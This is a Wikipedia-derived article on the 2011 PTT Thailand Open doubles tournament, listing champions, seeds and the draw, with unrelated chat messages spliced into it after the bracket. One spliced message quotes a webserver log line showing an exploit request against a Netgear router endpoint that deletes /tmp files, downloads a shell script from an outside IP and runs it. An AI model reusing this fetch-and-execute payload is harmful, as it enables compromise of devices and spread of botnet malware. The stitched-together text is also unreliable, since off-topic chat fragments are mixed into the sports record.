2011 PTT Thailand Open – Doubles

Christopher Kas and Viktor Troicki are the defending champions, but they decided not to participate this year.

Doubles
2011 PTT Thailand Open
Champions Oliver Marach
Aisam-ul-Haq Qureshi
Runners-up Michael Kohlmann
Alexander Waske
Final score7–6(7–4), 7–6(7–5)

Top seeded Oliver Marach and Aisam-ul-Haq Qureshi won the tournament beating unseeded German couple Michael Kohlmann and Alexander Waske in the final, 7–6(7–4), 7–6(7–5).

Seeds

  1. Oliver Marach / Aisam-ul-Haq Qureshi (Champions)
  2. Jonathan Erlich / Andy Ram (Quarterfinals)
  3. Simone Bolelli / Fabio Fognini (Semifinals)
  4. Paul Hanley / Dick Norman (Semifinals)

Draw

Key

Draw

First Round Quarterfinals Semifinals Final
1 O Marach
A-u-H Qureshi
6 77  
  J Delgado
J Marray
4 61   1 O Marach
A-u-H Qureshi
6 2 [10]
WC D Udomchoke
K Wachiramanowong
3 5     J Murray
A Sá
4 6 [7]
  J Murray
A Sá
6 7   1 O Marach
A-u-H Qureshi
6 6  
3 S Bolelli
F Fognini
7 3 [10] 3 S Bolelli
F Fognini
4 1  
  G Dimitrov
I Dodig
5 6 [4] 3 S Bolelli
F Fognini
6 78  
  S Giraldo
T Kamke
7 77     S Giraldo
T Kamke
2 66  
WC W Doakmaiklee
S Ratiwatana
5 64   1 O Marach
A-u-H Qureshi
77 77  
  P Andújar
G García-López
5 3     M Kohlmann
A Waske
64 65  
  R Haase
R Wassen
7 6     R Haase
R Wassen
4 3  
  J Cerretani
P Marx
5 3   4 P Hanley
D Norman
6 6  
4 P Hanley
D Norman
7 6   4 P Hanley
D Norman
4 64  
  M Kohlmann
A Waske
6 78     M Kohlmann
A Waske
6 77  
  A Fisher
F Moser
1 66     M Kohlmann
A Waske
2 6 [10]
  J Brunström
J Nieminen
3 2   2 J Erlich
A Ram
6 4 [7]
2 J Erlich
A Ram
6 6  
gollark: I downloaded one of *those* to look at, and ran `strings` on it, and as well as what look like HTTP requests (presumably trying to exploit other devices), there are sets of strings like these:
gollark: I looked at the `.sh` file there, and it appears to just be trying to download and execute a bunch of binaries for different architectures.
gollark: So I was looking through my webserver logs, as you do, and I found a bunch of requests like this among the typical exploit-spam or whatever it is:```<> 91.80.163.224 [21/Aug/2020:00:10:44 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.95.168.247/Scylla.sh+-O+/tmp/Scylla.sh;sh+Scylla.sh&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 31 "-" "-" ```
gollark: Oh right, Australia.
gollark: It was $30 or so earlier, and also never goes on sale.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.